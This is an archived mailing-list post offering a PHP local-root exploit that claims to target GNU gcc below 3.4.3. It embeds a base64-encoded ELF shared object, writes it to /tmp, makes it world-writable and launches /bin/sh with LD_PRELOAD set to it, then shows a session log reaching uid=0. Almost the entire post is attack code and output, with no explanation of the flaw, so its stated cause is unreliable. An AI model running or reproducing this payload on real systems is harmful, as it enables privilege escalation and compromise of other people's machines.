lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <BAY18-F2232F51F71B8CC25206EFDCF8E0@phx.gbl>
From: zzagorrzzagorr at hotmail.com (ZzagorR ZzagorR)
Subject: GNU gcc vuln. < 3.4.3 local root (.php)

#!/usr/bin/php -a
<?
/*
GNU gcc vuln. < 3.4.3
By ZzagorR (MARMARA UNIVERSITY)
zzagorrzzagorr@...mail.com
http://www.rootbinbash.com
thanks to [NST]
ah vizeler ahhhhh
*/
/*
sh-2.04$ chmod 777 gcc.php
chmod 777 gcc.php
sh-2.04$
sh-2.04$ ./gcc.php        -------OR>>>>>>  sh-2.04$ php gcc.php
./gcc.php
Interactive mode enabled

X-Powered-By: PHP/4.1.2
Content-type: text/html

[+] File Created
[+] chmod OK
[+] export OK
id
id

uid=0(root) gid=0(root) groups=48(apache)
uname -a
uname -a

Linux *.*****.** 2.4.9-6smp #1 SMP Thu Oct 18 09:22:57 EDT 2001 i686 unknown
cat /proc/version
cat /proc/version

Linux version 2.4.9-6smp (bhcompile@...ipples.devel.redhat.com) (gcc version 
2.96 20000731 (Red Hat Linux 7.1 2.96-85)) #1 SMP Thu Oct 18 09:22:57 EDT 
2001

exit
exit

uid=48(apache) gid=48(apache) groups=48(apache)
sh-2.04$
sh-2.04$

*/
$sll="f0VMRgEBAQAAAAAAAAAAAAMAAwABAAAAsAUAADQAAACQCgAAAAAAADQAIAADACgAGAAVAAEAAAAA";
$sll 
.="AAAAAAAAAAAAAAB8BwAAfAcAAAUAAAAAEAAAAQAAAHwHAAB8FwAAfBcAAAwBAAAkAQAABgAAAAAQ";
  $sll 
.="AAACAAAAjAcAAIwXAACMFwAAwAAAAMAAAAAGAAAABAAAABEAAAAkAAAAAAAAACAAAAAhAAAAAAAA";
   $sll 
.="ABcAAAAWAAAAAAAAAAAAAAAeAAAAGwAAAAAAAAAdAAAAAAAAACIAAAAVAAAAIwAAAAAAAAAAAAAA";
    $sll 
.="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
     $sll 
.="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZAAAAAAAAABoA";
      $sll 
.="AAAYAAAAAAAAAB8AAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJQAAAAAAAAAAwAB";
       $sll 
.="AAAAAABwAQAAAAAAAAMAAgAAAAAAsAMAAAAAAAADAAMAAAAAAH4EAAAAAAAAAwAEAAAAAADIBAAA";
        $sll 
.="AAAAAAMABQAAAAAA+AQAAAAAAAADAAYAAAAAADAFAAAAAAAAAwAHAAAAAABIBQAAAAAAAAMACAAA";
         $sll 
.="AAAAcAUAAAAAAAADAAkAAAAAALAFAAAAAAAAAwAKAAAAAABgBwAAAAAAAAMACwAAAAAAfBcAAAAA";
          $sll 
.="AAADAAwAAAAAAIgXAAAAAAAAAwANAAAAAACMFwAAAAAAAAMADgAAAAAATBgAAAAAAAADAA8AAAAA";
         $sll 
.="AFQYAAAAAAAAAwAQAAAAAABcGAAAAAAAAAMAEQAAAAAAiBgAAAAAAAADABIAAAAAAAAAAAAAAAAA";
        $sll 
.="AwATAAAAAAAAAAAAAAAAAAMAFACHAAAA6AYAAAoAAAASAAoAfwAAANwGAAAJAAAAEgAKAAEAAACM";
       $sll 
.="FwAAAAAAABEA8f+OAAAA9AYAAA4AAAASAAoAYgAAAAAAAAAnAAAAIgAAAHgAAADQBgAACQAAABIA";
      $sll 
.="CgAvAAAASAUAAAAAAAASAAgASgAAAAAAAAAjAAAAIgAAAKcAAACIGAAAAAAAABEA8f81AAAAYAcA";
     $sll 
.="AAAAAAASAAsAOwAAAAAAAAB7AAAAIgAAAKAAAACIGAAAAAAAABEA8f8KAAAAXBgAAAAAAAARAPH/";
    $sll 
.="swAAAKAYAAAAAAAAEQDx/yAAAAAAAAAAAAAAACAAAAAAX0RZTkFNSUMAX0dMT0JBTF9PRkZTRVRf";
   $sll 
.="VEFCTEVfAF9fZ21vbl9zdGFydF9fAF9pbml0AF9maW5pAF9fY3hhX2ZpbmFsaXplAF9fZGVyZWdp";
  $sll 
.="c3Rlcl9mcmFtZV9pbmZvAF9fcmVnaXN0ZXJfZnJhbWVfaW5mbwBnZXR1aWQAZ2V0ZXVpZABnZXRn";
$sll 
.="aWQAZ2V0ZWdpZABsaWJjLnNvLjYAX2VkYXRhAF9fYnNzX3N0YXJ0AF9lbmQAR0xJQkNfMi4xLjMA";
$sll 
.="R0xJQkNfMi4wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAQAB";
$sll 
.="AAEAAgABAAEAAgABAAEAAwABAAEAAQAAAAAAAQACAJYAAAAQAAAAAAAAAHMfaQkAAAMAuAAAABAA";
  $sll 
.="AAAQaWkNAAACAMQAAAAAAAAAfBcAAAgAAACAFwAACAAAAHgYAAAIAAAAdBgAAAYZAAB8GAAABhwA";
   $sll 
.="AIAYAAAGHwAAhBgAAAYjAABoGAAABxkAAGwYAAAHHAAAcBgAAAcfAABVieWD7BRT6AAAAABbgcMI";
    $sll 
.="EwAA6FAAAADoGwEAAOimAQAAW8nDAAAA/7MEAAAA/6MIAAAAAAAAAP+jDAAAAGgAAAAA6eD/////";
     $sll 
.="oxAAAABoCAAAAOnQ/////6MUAAAAaBAAAADpwP///1WJ5YPsFFPoAAAAAFuBw6ASAACLgygAAACF";
      $sll 
.="wHQC/9BbycOJ9pCQkJCQkJCQkJCQkFWJ5YPsFFPoAAAAAFuBw3ASAACDuyj///8AdWSDuyQAAAAA";
       $sll 
.="dC6DxPSLgxwAAAD/MOiL////g8QQ6xmNtgAAAACLgyT///+NUASJkyT///+LAP/Qi4Mk////gzgA";
        $sll 
.="deKDuyAAAAAAdA+DxPSNgyz///9Q6Dr////Hgyj///8BAAAAi13oycONdgBVieWD7BRT6AAAAABb";
         $sll 
.="gcPoEQAAW8nDifZVieWD7BRT6AAAAABbgcPQEQAAg7sYAAAAAHQWg8T4jYMsAAAAUI2DLP///1Do";
          $sll 
.="zv7//4td6MnDkFWJ5YPsFFPoAAAAAFuBw5gRAABbycOJ9lWJ5THA6wDJw412AFWJ5THA6wDJw412";
         $sll 
.="AFWJ5THA6wGQycOJ9lWJ5THA6wWQjXQmAMnDjbQmAAAAAI28JwAAAABVieWD7BBWU+gAAAAAW4HD";
        $sll 
.="PxEAAI2z8P///4O78P////90DIsG/9CDxvyDPv919FteycOQVYnlg+wUU+gAAAAAW4HDDBEAAFvJ";
       $sll 
.="w422AAAAAFWJ5YPsFFPoAAAAAFuBw/AQAACQ6Gf+//9bycN8FwAAWBgAAAAAAAAAAAAAAQAAAJYA";
      $sll 
.="AAAMAAAASAUAAA0AAABgBwAABAAAAJQAAAAFAAAAsAMAAAYAAABwAQAACgAAAM4AAAALAAAAEAAA";
     $sll 
.="AAMAAABcGAAAAgAAABgAAAAUAAAAEQAAABcAAAAwBQAAEQAAAPgEAAASAAAAOAAAABMAAAAIAAAA";
    $sll 
.="/v//b8gEAAD///9vAQAAAPD//29+BAAA+v//bwMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
   $sll 
.="AAAAAAAAAAAAAAAAAAAA/////wAAAAD/////AAAAAIwXAAAAAAAAAAAAAIYFAACWBQAApgUAAAAA";
  $sll 
.="AAB8FwAAAAAAAAAAAAAAAAAAAEdDQzogKEdOVSkgMi45NS40IDIwMDExMDAyIChEZWJpYW4gcHJl";
$sll 
.="cmVsZWFzZSkAAEdDQzogKEdOVSkgMi45NS40IDIwMDExMDAyIChEZWJpYW4gcHJlcmVsZWFzZSkA";
$sll 
.="AEdDQzogKEdOVSkgMi45NS40IDIwMDExMDAyIChEZWJpYW4gcHJlcmVsZWFzZSkAAEdDQzogKEdO";
$sll 
.="VSkgMi45NS40IDIwMDExMDAyIChEZWJpYW4gcHJlcmVsZWFzZSkAAEdDQzogKEdOVSkgMi45NS40";
  $sll 
.="IDIwMDExMDAyIChEZWJpYW4gcHJlcmVsZWFzZSkACAAAAAAAAAABAAAAMDEuMDEAAAAIAAAAAAAA";
   $sll 
.="AAEAAAAwMS4wMQAAAAgAAAAAAAAAAQAAADAxLjAxAAAACAAAAAAAAAABAAAAMDEuMDEAAAAIAAAA";
    $sll 
.="AAAAAAEAAAAwMS4wMQAAAAAuc3ltdGFiAC5zdHJ0YWIALnNoc3RydGFiAC5oYXNoAC5keW5zeW0A";
     $sll 
.="LmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbC5keW4ALnJlbC5wbHQALmlu";
      $sll 
.="aXQALnRleHQALmZpbmkALmRhdGEALmVoX2ZyYW1lAC5keW5hbWljAC5jdG9ycwAuZHRvcnMALmdv";
       $sll 
.="dAAuYnNzAC5jb21tZW50AC5ub3RlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
        $sll 
.="AAAAAAAAAAAbAAAABQAAAAIAAACUAAAAlAAAANwAAAACAAAAAAAAAAQAAAAEAAAAIQAAAAsAAAAC";
         $sll 
.="AAAAcAEAAHABAABAAgAAAwAAABUAAAAEAAAAEAAAACkAAAADAAAAAgAAALADAACwAwAAzgAAAAAA";
          $sll 
.="AAAAAAAAAQAAAAAAAAAxAAAA////bwIAAAB+BAAAfgQAAEgAAAACAAAAAAAAAAIAAAACAAAAPgAA";
         $sll 
.="AP7//28CAAAAyAQAAMgEAAAwAAAAAwAAAAEAAAAEAAAAAAAAAE0AAAAJAAAAAgAAAPgEAAD4BAAA";
        $sll 
.="OAAAAAIAAAAAAAAABAAAAAgAAABWAAAACQAAAAIAAAAwBQAAMAUAABgAAAACAAAACQAAAAQAAAAI";
       $sll 
.="AAAAXwAAAAEAAAAGAAAASAUAAEgFAAAlAAAAAAAAAAAAAAAEAAAAAAAAAFoAAAABAAAABgAAAHAF";
      $sll 
.="AABwBQAAQAAAAAAAAAAAAAAABAAAAAQAAABlAAAAAQAAAAYAAACwBQAAsAUAALABAAAAAAAAAAAA";
     $sll 
.="ABAAAAAAAAAAawAAAAEAAAAGAAAAYAcAAGAHAAAcAAAAAAAAAAAAAAAEAAAAAAAAAHEAAAABAAAA";
    $sll 
.="AwAAAHwXAAB8BwAADAAAAAAAAAAAAAAABAAAAAAAAAB3AAAAAQAAAAMAAACIFwAAiAcAAAQAAAAA";
   $sll 
.="AAAAAAAAAAQAAAAAAAAAgQAAAAYAAAADAAAAjBcAAIwHAADAAAAAAwAAAAAAAAAEAAAACAAAAIoA";
  $sll 
.="AAABAAAAAwAAAEwYAABMCAAACAAAAAAAAAAAAAAABAAAAAAAAACRAAAAAQAAAAMAAABUGAAAVAgA";
$sll 
.="AAgAAAAAAAAAAAAAAAQAAAAAAAAAmAAAAAEAAAADAAAAXBgAAFwIAAAsAAAAAAAAAAAAAAAEAAAA";
$sll 
.="BAAAAJ0AAAAIAAAAAwAAAIgYAACICAAAGAAAAAAAAAAAAAAABAAAAAAAAACiAAAAAQAAAAAAAAAA";
$sll 
.="AAAAiAgAAPAAAAAAAAAAAAAAAAEAAAAAAAAAqwAAAAcAAAAAAAAAAAAAAHgJAABkAAAAAAAAAAAA";
  $sll 
.="AAABAAAAAAAAABEAAAADAAAAAAAAAAAAAADcCQAAsQAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAgAA";
   $sll 
.="AAAAAAAAAAAAUA4AACAEAAAXAAAAMwAAAAQAAAAQAAAACQAAAAMAAAAAAAAAAAAAAHASAADbAQAA";
    $sll 
.="AAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlAAAAAAAAAADAAEAAAAAAHABAAAA";
     $sll 
.="AAAAAwACAAAAAACwAwAAAAAAAAMAAwAAAAAAfgQAAAAAAAADAAQAAAAAAMgEAAAAAAAAAwAFAAAA";
      $sll 
.="AAD4BAAAAAAAAAMABgAAAAAAMAUAAAAAAAADAAcAAAAAAEgFAAAAAAAAAwAIAAAAAABwBQAAAAAA";
       $sll 
.="AAMACQAAAAAAsAUAAAAAAAADAAoAAAAAAGAHAAAAAAAAAwALAAAAAAB8FwAAAAAAAAMADAAAAAAA";
        $sll 
.="iBcAAAAAAAADAA0AAAAAAIwXAAAAAAAAAwAOAAAAAABMGAAAAAAAAAMADwAAAAAAVBgAAAAAAAAD";
         $sll 
.="ABAAAAAAAFwYAAAAAAAAAwARAAAAAACIGAAAAAAAAAMAEgAAAAAAAAAAAAAAAAADABMAAAAAAAAA";
          $sll 
.="AAAAAAAAAwAUAAAAAAAAAAAAAAAAAAMAFQAAAAAAAAAAAAAAAAADABYAAAAAAAAAAAAAAAAAAwAX";
         $sll 
.="AAEAAACwBQAAAAAAAAAACgAQAAAAsAUAAAAAAAACAAoAIAAAAAAAAAAAAAAABADx/wEAAADgBQAA";
        $sll 
.="AAAAAAAACgArAAAAgBcAAAAAAAABAAwALwAAAFQYAAAAAAAAAQAQAD0AAACEFwAAAAAAAAEADABJ";
       $sll 
.="AAAA4AUAAAAAAAACAAoAXwAAAIgXAAAAAAAAAQANAHIAAABoBgAAAAAAAAIACgB9AAAAiBgAABgA";
      $sll 
.="AAABABIAhwAAAIAGAAAAAAAAAgAKAJMAAAC4BgAAAAAAAAIACgCeAAAAiBcAAAAAAAABAAwArAAA";
     $sll 
.="AEwYAAAAAAAAAQAPACAAAAAAAAAAAAAAAAQA8f8BAAAAEAcAAAAAAAAAAAoAugAAABAHAAAAAAAA";
    $sll 
.="AgAKANAAAABQGAAAAAAAAAEADwCTAAAARAcAAAAAAAACAAoAngAAAIgXAAAAAAAAAQAMAN0AAABY";
   $sll 
.="GAAAAAAAAAEAEADqAAAAiBcAAAAAAAABAA0AAQAAAGAHAAAAAAAAAAAKAPgAAAAAAAAAAAAAAAQA";
  $sll 
.="8f8BAAAA0AYAAAAAAAAAAAoA/gAAAHwXAAAAAAAAAQIMAAsBAADoBgAACgAAABIACgASAQAA3AYA";
$sll 
.="AAkAAAASAAoAGgEAAIwXAAAAAAAAEQDx/yMBAAD0BgAADgAAABIACgArAQAAAAAAACcAAAAiAAAA";
$sll 
.="TAEAANAGAAAJAAAAEgAKAFMBAABIBQAAAAAAABIACABZAQAAAAAAACMAAAAiAAAAfAEAAIgYAAAA";
$sll 
.="AAAAEQDx/4gBAABgBwAAAAAAABIACwCOAQAAAAAAAHsAAAAiAAAAqgEAAIgYAAAAAAAAEQDx/7EB";
  $sll 
.="AABcGAAAAAAAABEA8f/HAQAAoBgAAAAAAAARAPH/zAEAAAAAAAAAAAAAIAAAAABnY2MyX2NvbXBp";
   $sll 
.="bGVkLgBjYWxsX2dtb25fc3RhcnQAY3J0c3R1ZmYuYwBwLjMAX19EVE9SX0xJU1RfXwBjb21wbGV0";
    $sll 
.="ZWQuNABfX2RvX2dsb2JhbF9kdG9yc19hdXgAX19FSF9GUkFNRV9CRUdJTl9fAGZpbmlfZHVtbXkA";
     $sll 
.="b2JqZWN0LjExAGZyYW1lX2R1bW15AGluaXRfZHVtbXkAZm9yY2VfdG9fZGF0YQBfX0NUT1JfTElT";
      $sll 
.="VF9fAF9fZG9fZ2xvYmFsX2N0b3JzX2F1eABfX0NUT1JfRU5EX18AX19EVE9SX0VORF9fAF9fRlJB";
       $sll 
.="TUVfRU5EX18AbnN0LmMAX19kc29faGFuZGxlAGdldGdpZABnZXRldWlkAF9EWU5BTUlDAGdldGVn";
        $sll 
.="aWQAX19yZWdpc3Rlcl9mcmFtZV9pbmZvQEBHTElCQ18yLjAAZ2V0dWlkAF9pbml0AF9fZGVyZWdp";
         $sll 
.="c3Rlcl9mcmFtZV9pbmZvQEBHTElCQ18yLjAAX19ic3Nfc3RhcnQAX2ZpbmkAX19jeGFfZmluYWxp";
          $sll 
.="emVAQEdMSUJDXzIuMS4zAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABfX2dtb25f";
         $sll .="c3RhcnRfXwA=";
        echo("By ZzagorR - http://www.rootbinbash.com\n");
       $sll=base64_decode($sll);
      $tester1="/tmp/hellogcc";
     $testw = fopen($tester1, "w");
    ini_set('user_agent',__FILE__);
   fwrite($testw,$sll);
  fclose($testw);
echo("[+] File Created\n");
$islem1="chmod 777 /tmp/hellogcc";
$islem2="export LD_LIBRARY_PATH=/tmp";
   $islem3="LD_PRELOAD=/tmp/hellogcc /bin/sh";
    system($islem1);
     echo("[+] chmod OK\n");
      system($islem2);
       echo("[+] export OK [next cmd:id+enter:)]\n");
        system($islem3);
         system("id");
?>

_________________________________________________________________
Hem e-postalarinizi, hem de Bilgisayarinizi MSN Güvenlik ile koruma altina 
alin! http://www.msn.com.tr/security/


Powered by blists - more mailing lists